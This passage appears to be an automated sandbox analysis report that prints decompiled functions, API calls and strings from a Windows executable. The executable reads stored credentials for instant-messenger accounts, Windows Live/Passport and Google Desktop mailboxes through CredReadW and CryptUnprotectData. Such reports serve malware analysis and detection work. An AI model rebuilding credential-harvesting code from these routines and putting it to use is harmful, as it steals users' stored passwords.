				E00409DD6(_t28, _t17);
				_push(_t28);
				sprintf( &_v516, "<%s>");
				return E004067EC(_a4,  &_v516);
			}











                                0x0040a641
                                0x0040a643
                                0x0040a64a
                                0x0040a659
                                0x0040a660
                                0x0040a66d
                                0x0040a679
                                0x0040a67d
                                0x0040a683
                                0x0040a68a
                                0x0040a697
                                0x0040a6b1

                                APIs
                                • memset.MSVCRT ref: 0040A64A
                                • memset.MSVCRT ref: 0040A660
                                  • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
                                  • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
                                  • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
                                  • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
                                • sprintf.MSVCRT ref: 0040A697
                                Strings
                                • <%s>, xrefs: 0040A691
                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040A665
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                • API String ID: 3699762281-1998499579
                                • Opcode ID: ab5707da10e36317461923ea0a964ffd6f4046b5a0df19b15fd79c1ac8c7a337
                                • Instruction ID: 800cbe4d2eb2546f00b8b879064eadffaf4e9ad3efc3a30f3f6e1286e630d524
                                • Opcode Fuzzy Hash: ab5707da10e36317461923ea0a964ffd6f4046b5a0df19b15fd79c1ac8c7a337
                                • Instruction Fuzzy Hash: 92012B7294021977DB21A715CC46FDA7B6CAF14709F0400BBB50DF3082DB789B848BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409370, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: f3ce8d52872a8f30b96e2fbf292860e550b06a588b426c696271bbab4e9a7e1e
                                • Instruction ID: fe66dba444066183ee9975a3477c76674c14659d363ac613d024ab661048b2ad
                                • Opcode Fuzzy Hash: f3ce8d52872a8f30b96e2fbf292860e550b06a588b426c696271bbab4e9a7e1e
                                • Instruction Fuzzy Hash: 25F0FF726097015BD7209FAAB5C059BB7E9BB49725B60193FF54DD3682C738BC808A1C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004093D6, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                Download Yara Rule
                                C-Code - Quality: 31%
                                			E004093D6(intOrPtr* __edi) {
				void* __esi;
				intOrPtr* _t7;
				intOrPtr* _t12;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;

				_t18 = __edi;
				 *__edi = 0x418528;
				E00409370(__edi);
				_t21 =  *((intOrPtr*)(__edi + 0x10));
				if(_t21 != 0) {
					E00407491(_t21);
					0x413d56(_t21);
				}
				_t22 =  *((intOrPtr*)(_t18 + 0xc));
				if(_t22 != 0) {
					E00407491(_t22);
					0x413d56(_t22);
				}
				_t23 =  *((intOrPtr*)(_t18 + 8));
				if(_t23 != 0) {
					E00407491(_t23);
					0x413d56(_t23);
				}
				_t24 =  *((intOrPtr*)(_t18 + 4));
				if(_t24 != 0) {
					E00407491(_t24);
					0x413d56(_t24);
				}
				_t12 = _t18;
				_t7 =  *((intOrPtr*)( *_t12))();
				0x413de6( *_t7);
				return _t7;
			}











                                0x004093d6
                                0x004093d9
                                0x004093df
                                0x004093e4
                                0x004093e9
                                0x004093eb
                                0x004093f1
                                0x004093f6
                                0x004093f7
                                0x004093fc
                                0x004093fe
                                0x00409404
                                0x00409409
                                0x0040940a
                                0x0040940f
                                0x00409411
                                0x00409417
                                0x0040941c
                                0x0040941d
                                0x00409422
                                0x00409424
                                0x0040942a
                                0x0040942f
                                0x00409430
                                0x0040943a
                                0x0040943e
                                0x00409444

                                APIs
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040937C
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040938A
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040939B
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093B2
                                  • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093BB
                                • ??3@YAXPAX@Z.MSVCRT ref: 004093F1
                                • ??3@YAXPAX@Z.MSVCRT ref: 00409404
                                • ??3@YAXPAX@Z.MSVCRT ref: 00409417
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040942A
                                • ??3@YAXPAX@Z.MSVCRT ref: 0040943E
                                  • Part of subcall function 00407491: ??3@YAXPAX@Z.MSVCRT ref: 00407498
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??3@
                                • String ID:
                                • API String ID: 613200358-0
                                • Opcode ID: ac05d42046456b830cc0969aedd76e8629731d07fd3b456628963a844cb8144e
                                • Instruction ID: 09cfe481c9f5149ef6062cf2713671c90beccbfb684cd0f5c8863379cec44e3f
                                • Opcode Fuzzy Hash: ac05d42046456b830cc0969aedd76e8629731d07fd3b456628963a844cb8144e
                                • Instruction Fuzzy Hash: 67F06232D0E53167C9257F26B00158EA7646E46725315426FF8097B3D3CF3C6D8146EE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411B27, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00406B6F: memset.MSVCRT ref: 00406B8F
                                  • Part of subcall function 00406B6F: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406BA2
                                  • Part of subcall function 00406B6F: _strcmpi.MSVCRT ref: 00406BB4
                                • SetBkMode.GDI32(?,00000001), ref: 00411B4E
                                • GetSysColor.USER32(00000005), ref: 00411B56
                                • SetBkColor.GDI32(?,00000000), ref: 00411B60
                                • SetTextColor.GDI32(?,00C00000), ref: 00411B6E
                                • GetSysColorBrush.USER32(00000005), ref: 00411B76
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Color$BrushClassModeNameText_strcmpimemset
                                • String ID:
                                • API String ID: 2775283111-0
                                • Opcode ID: 4c6c90dc6369ed9def7ad49a685608b6b97007b198ef546a8f3c4911ca2b9476
                                • Instruction ID: b9af807899647846139a12986955ac2cc84645abd360b6802fc8b760439410eb
                                • Opcode Fuzzy Hash: 4c6c90dc6369ed9def7ad49a685608b6b97007b198ef546a8f3c4911ca2b9476
                                • Instruction Fuzzy Hash: 92F03136104504FBDF112FA5EC09FDE3F25EF44721F10812AFA19951B1DB75A9A09B58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040FF88, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00404109: LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,75D6F420,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
                                  • Part of subcall function 00404109: GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
                                  • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
                                  • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147
                                  • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
                                  • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
                                • LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressProc$ByteCharLibraryLoadMultiWide$FreeLocal
                                • String ID: Passport.Net\*
                                • API String ID: 4171712514-3671122194
                                • Opcode ID: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
                                • Instruction ID: a8053254f1e515f4d897164d33fe2023de59da6d422685d1f9c73d0263123044
                                • Opcode Fuzzy Hash: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
                                • Instruction Fuzzy Hash: 9231F7B1D01129AADB10DF95DC44EDEBBB8FF49750F11406BF610A7250D7789A81CBA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410AC5, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                • GetFileSize.KERNEL32(00000000,00000000,MySpace\IM\users.txt,00000104,00000000,?,?,?,?,00410C45,?,00000000), ref: 00410AE7
                                  • Part of subcall function 00407A56: ??3@YAXPAX@Z.MSVCRT ref: 00407A5D
                                  • Part of subcall function 00407A56: ??2@YAPAXI@Z.MSVCRT ref: 00407A6B
                                  • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,?,?,?,?,?,?,?,00410C45), ref: 00410B64
                                  • Part of subcall function 004108FA: memset.MSVCRT ref: 00410939
                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00410C45,?,00000000), ref: 00410B78
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: File$??2@??3@ByteCharCloseCreateHandleMultiReadSizeWidememset
                                • String ID: MySpace\IM\users.txt
                                • API String ID: 429556018-1720829597
                                • Opcode ID: 9ecfc60a0865bdac6d3c577decf5946b40f4711ca6fbc71636231e6ee1035587
                                • Instruction ID: 28eca0bbeff0950369e7ada1521615d79b3b69832f60dc8e7f5924118cda3e2e
                                • Opcode Fuzzy Hash: 9ecfc60a0865bdac6d3c577decf5946b40f4711ca6fbc71636231e6ee1035587
                                • Instruction Fuzzy Hash: 21217171C0424AEFCF00DFA9CC458DEBB74EF41328B158166E924772A1C634AA45CBA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00402834, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • memset.MSVCRT ref: 00402873
                                  • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                • RegCloseKey.ADVAPI32(?), ref: 004028C2
                                • RegCloseKey.ADVAPI32(?), ref: 004028DF
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Close$EnumOpenmemset
                                • String ID: Software\AIM\AIMPRO
                                • API String ID: 2255314230-3527110354
                                • Opcode ID: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
                                • Instruction ID: 67585355273d4b01a1114a6cd89f6c97ebf6c1cbf8b7b4d496df69d3c229a794
                                • Opcode Fuzzy Hash: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
                                • Instruction Fuzzy Hash: 48115E76904118BADF21A792ED06FDE7B7CDF54304F0000B6AA44E1091EB756FD5DA64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407BC6, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 37%
                                			E00407BC6(intOrPtr* _a4) {
				void* _v12;
				void* _v16;
				void _v271;
				char _v272;
				void** _t16;
				char* _t19;
				char* _t21;
				int _t26;
				void* _t28;
				void* _t29;
				void* _t30;
				void* _t31;

				_t16 =  &_v12;
				0x411d68(0x80000001, "Software\Google\Google Desktop\Mailboxes", _t16);
				_t29 = _t28 + 0xc;
				if(_t16 == 0) {
					_t26 = 0;
					_v272 = 0;
					memset( &_v271, 0, 0xff);
					_t30 = _t29 + 0xc;
					_t19 =  &_v272;
					0x411dee(_v12, 0, _t19);
					while(1) {
						_t31 = _t30 + 0xc;
						if(_t19 != 0) {
							break;
						}
						_t21 =  &_v272;
						0x411d68(_v12, _t21,  &_v16);
						_t30 = _t31 + 0xc;
						if(_t21 == 0) {
							E00407A93(_a4, _v16,  &_v272);
							RegCloseKey(_v16);
						}
						_t19 =  &_v272;
						_t26 = _t26 + 1;
						0x411dee(_v12, _t26, _t19);
					}
					return RegCloseKey(_v12);
				}
				return _t16;
			}















                                0x00407bd1
                                0x00407bdf
                                0x00407be4
                                0x00407be9
                                0x00407bf4
                                0x00407bfe
                                0x00407c05
                                0x00407c0a
                                0x00407c0d
                                0x00407c18
                                0x00407c67
                                0x00407c67
                                0x00407c6c
                                0x00000000
                                0x00000000
                                0x00407c29
                                0x00407c33
                                0x00407c38
                                0x00407c3d
                                0x00407c4c
                                0x00407c54
                                0x00407c54
                                0x00407c56
                                0x00407c5d
                                0x00407c62
                                0x00407c62
                                0x00000000
                                0x00407c71
                                0x00407c76

                                APIs
                                  • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                • memset.MSVCRT ref: 00407C05
                                  • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                • RegCloseKey.ADVAPI32(?), ref: 00407C54
                                • RegCloseKey.ADVAPI32(?), ref: 00407C71
                                Strings
                                • Software\Google\Google Desktop\Mailboxes, xrefs: 00407BD5
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: Close$EnumOpenmemset
                                • String ID: Software\Google\Google Desktop\Mailboxes
                                • API String ID: 2255314230-2212045309
                                • Opcode ID: b50ec71faf233748746677e360152f00ca846f408f6190e6d0fa9129bc25d888
                                • Instruction ID: a9c93927ac610b6ef28ec82afd47bdb8c9c4627465144405bf34b6a811739c17
                                • Opcode Fuzzy Hash: b50ec71faf233748746677e360152f00ca846f408f6190e6d0fa9129bc25d888
                                • Instruction Fuzzy Hash: E9115EB6D04118BADF21AB91EC41FDEBB7CDF55304F0041B6BA04E1051E7756B94CEA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00403BF0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
                                Download Yara Rule
                                C-Code - Quality: 58%
                                			E00403BF0(intOrPtr __ecx, void* __edx, void* __eflags, long long __fp0, void* _a4) {
				intOrPtr _v8;
				char _v272;
				void _v528;
				void _v536;
				char _v540;
				intOrPtr _v544;
				void* __edi;
				void* __esi;
				void* _t24;
				char* _t27;
				intOrPtr _t32;
				void* _t37;
				void* _t40;
				char* _t44;
				void* _t46;

				_v544 = __ecx;
				_v540 = 0x417ea8;
				E0040D77D( &_v528);
				memset( &_v536, 0, 0x214);
				_t24 = memcpy( &_v528, _a4, 0x82 << 2);
				0x413d62( &_v272,  &_v528, _t40, _t46);
				_pop(_t37);
				if(_t24 != 0) {
					_t44 =  &_v272;
					_v8 = E004037A2(_t44, __fp0);
					_t27 = _t44;
					0x413d74( &_v528);
					_t37 = _t27;
					if(_t27 == 0) {
						_t32 = 0xa;
						if(_v8 > _t32) {
							_v8 = _t32;
						}
					}
				} else {
					_v8 = 1;
				}
				E00409D21(_t37, _v544,  &_v540);
				return 1;
			}


















                                0x00403c02
                                0x00403c06
                                0x00403c0e
                                0x00403c1f
                                0x00403c40
                                0x00403c42
                                0x00403c4a
                                0x00403c4b
                                0x00403c5a
                                0x00403c66
                                0x00403c72
                                0x00403c75
                                0x00403c7d
                                0x00403c7e
                                0x00403c82
                                0x00403c8a
                                0x00403c8c
                                0x00403c8c
                                0x00403c8a
                                0x00403c4d
                                0x00403c4d
                                0x00403c4d
                                0x00403c9c
                                0x00403ca9

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _mbscmp_mbsicmpmemset
                                • String ID: :@
                                • API String ID: 1080945674-3074689909
                                • Opcode ID: fc6b87c77e97942f29d542673130d1b31dda64e9daeb6a0660619c666916343b
                                • Instruction ID: 05d51c46cf4b3144aa59074ae4edee5e5c3f47845a6acae635e5c8c721b5e64e
                                • Opcode Fuzzy Hash: fc6b87c77e97942f29d542673130d1b31dda64e9daeb6a0660619c666916343b
                                • Instruction Fuzzy Hash: 9911867250C3459AD720EEA5E809BDB77DCEB84315F004D3FF594E3181E7749609879A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041051F, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • _wcsnicmp.MSVCRT ref: 0041053E
                                  • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
                                  • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00410570
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00410587
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ByteCharMultiWidememset$_wcsnicmp
                                • String ID: windowslive:name=
                                • API String ID: 947294041-3311407311
                                • Opcode ID: fd4d89018f6d8f297b5807dfdb0caed421d73eceed85ab27545bd491571ae371
                                • Instruction ID: aaacd06d763df2f40df435721f5dd751edfa9d120b015f6101ff871e9026a9e8
                                • Opcode Fuzzy Hash: fd4d89018f6d8f297b5807dfdb0caed421d73eceed85ab27545bd491571ae371
                                • Instruction Fuzzy Hash: A80184B6604209BFD710DF59DC84DD77BECEB49364F10462ABA28D72A1D630DD04CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F2E1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040F325
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040F339
                                • _wcsnicmp.MSVCRT ref: 0040F347
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ByteCharMultiWide$_wcsnicmp
                                • String ID: http://www.imvu.com
                                • API String ID: 1082246498-3717390816
                                • Opcode ID: d858862f83375720269192bc115d82f05b3495ae824a477da88cd8a016989edf
                                • Instruction ID: a621eff572e40bce3e368aabcc4a0ad2a08d37bae4b59898fbad6a548f86f146
                                • Opcode Fuzzy Hash: d858862f83375720269192bc115d82f05b3495ae824a477da88cd8a016989edf
                                • Instruction Fuzzy Hash: CD1152B2544349AED7309E599C84EEB7FACEB89364F10062EB96892191D7305A14C6B2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00410894, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
                                Download Yara Rule
                                APIs
                                • memcpy.MSVCRT ref: 004108AE
                                • memcpy.MSVCRT ref: 004108C0
                                • DialogBoxParamA.USER32(0000006B,?,Function_000105A6,00000000), ref: 004108E4
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: memcpy$DialogParam
                                • String ID: ;4
                                • API String ID: 392721444-4181167889
                                • Opcode ID: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
                                • Instruction ID: 2aaa1d25541d53f243854b8b99eb4e9492d8e88977a0f1258d463d5600498ee3
                                • Opcode Fuzzy Hash: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
                                • Instruction Fuzzy Hash: 86F0A771A44730BBF7216F55BC06BC67A91AB08B06F218036F545A51D0C3B925D08FDC
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00406B6F, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                Download Yara Rule
                                C-Code - Quality: 40%
                                			E00406B6F(struct HWND__* _a4) {
				void _v259;
				char _v260;
				signed int _t10;

				_v260 = 0;
				memset( &_v259, 0, 0xff);
				GetClassNameA(_a4,  &_v260, 0xff);
				_t10 =  &_v260;
				0x413dce(_t10, "edit");
				asm("sbb eax, eax");
				return  ~_t10 + 1;
			}






                                0x00406b88
                                0x00406b8f
                                0x00406ba2
                                0x00406ba8
                                0x00406bb4
                                0x00406bbd
                                0x00406bc2

                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ClassName_strcmpimemset
                                • String ID: edit
                                • API String ID: 275601554-2167791130
                                • Opcode ID: 1fc934d62d77a70a9e396aa4a7c9eacbfe567db38c0b85652fff254433e2e45d
                                • Instruction ID: aca7036e1f85a757735cd09c7bf6aa39e2ce89dfda263754777898d954571a1f
                                • Opcode Fuzzy Hash: 1fc934d62d77a70a9e396aa4a7c9eacbfe567db38c0b85652fff254433e2e45d
                                • Instruction Fuzzy Hash: 61E09BB3C5012A6ADB11AA64EC05FE5376C9F54705F0001F6B949E2081E5B457C44B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00401085, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26windowCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00401085(void* __edi) {
				struct tagLOGFONTA _v64;
				int* _t12;

				E00406A19( &_v64, "MS Sans Serif", 0xa, 1);
				_t12 = __edi + 0x20c;
				 *_t12 = CreateFontIndirectA( &_v64);
				return SendMessageA(GetDlgItem( *(__edi + 4), 0x3ec), 0x30,  *_t12, 0);
			}





                                0x00401098
                                0x004010a4
                                0x004010b8
                                0x004010cf

                                APIs
                                  • Part of subcall function 00406A19: memset.MSVCRT ref: 00406A23
                                  • Part of subcall function 00406A19: _mbscpy.MSVCRT ref: 00406A63
                                • CreateFontIndirectA.GDI32(?), ref: 004010AA
                                • GetDlgItem.USER32(?,000003EC), ref: 004010BA
                                • SendMessageA.USER32(00000000,00000030,?,00000000), ref: 004010C7
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: CreateFontIndirectItemMessageSend_mbscpymemset
                                • String ID: MS Sans Serif
                                • API String ID: 2650341901-168460110
                                • Opcode ID: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
                                • Instruction ID: 5c9505941c48c8dd7a2399cb1aaf590a0077e647136f214fd0fe6491ebdd60b9
                                • Opcode Fuzzy Hash: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
                                • Instruction Fuzzy Hash: 67E06D71A40604FBCB116BA0EC0AFCABB6CAB44700F108125FA51B60E1D7B0A114CB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412192, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
                                • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5
                                Strings
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: SHGetSpecialFolderPathA$shell32.dll
                                • API String ID: 2574300362-543337301
                                • Opcode ID: 65bafe7a062dc340e9a6b521779d20cd872f84261b23a2d66ef8095fb01f6124
                                • Instruction ID: a03a44e40ad870f41b9c2d8f2e6b277420dcc77a40eb9148cfb32e265f33a348
                                • Opcode Fuzzy Hash: 65bafe7a062dc340e9a6b521779d20cd872f84261b23a2d66ef8095fb01f6124
                                • Instruction Fuzzy Hash: 2ED0C978A00302EBEB20DF61BD597D63FA8A74C711F20C036F905D2262DBB865D0CA2C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00412D65, Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: ??2@$memset
                                • String ID:
                                • API String ID: 1860491036-0
                                • Opcode ID: cefea47da0d948a8b2b7f14bfbe4bf7bfbc63bea052a784fe90b9effbb1e0511
                                • Instruction ID: 077d2ad6405c458e4821e20ddf5ab0b81a66c3d9f88b424bd3f36c9f492752c9
                                • Opcode Fuzzy Hash: cefea47da0d948a8b2b7f14bfbe4bf7bfbc63bea052a784fe90b9effbb1e0511
                                • Instruction Fuzzy Hash: F0310AB4A007008FDB609F2AD945692FBF4FF84305F25886FD549CB262D7B8D491CB19
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004116A9, Relevance: 6.3, APIs: 5, Instructions: 51stringCOMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000017.00000002.470454955.000000000041B000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: _strcmpistrchr$_mbscpymemsetstrrchr
                                • String ID:
                                • API String ID: 274398480-0
                                • Opcode ID: 8152aa6171c4159ef6465b31656666253e18c95892931f65106702393bd21b79
                                • Instruction ID: 328b4c9133cd54f2635944cbca80cb08cea31e8af7c0159c33255436c65d5f23
                                • Opcode Fuzzy Hash: 8152aa6171c4159ef6465b31656666253e18c95892931f65106702393bd21b79
                                • Instruction Fuzzy Hash: C601D6756082087AEB20BB72DC03FCB3B9C8F1175AF10005FF689A50D1EEA8D6C146AD
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040C9C7, Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E0040C9C7(void* __edi, void* __esi, void* _a4) {
				signed int _t13;
				signed int _t25;
				int _t26;
				char* _t30;
				void* _t31;
				void* _t33;
				void* _t35;

				_t35 = __esi;
				_t25 = 0x3f;
				_t13 =  *(__esi + 0x10) >> 0x00000003 & _t25;
				_t30 = __esi + 0x18 + _t13;
				 *_t30 = 0x80;
				_t26 = _t25 - _t13;
				_t31 = _t30 + 1;
				if(_t26 >= 8) {
					memset(_t31, 0, _t26 + 0xfffffff8);
				} else {
					memset(_t31, 0, _t26);
					_t33 = __esi + 0x18;
					E0040CA46(_t33, __esi);
					memset(_t33, 0, 0x38);
				}
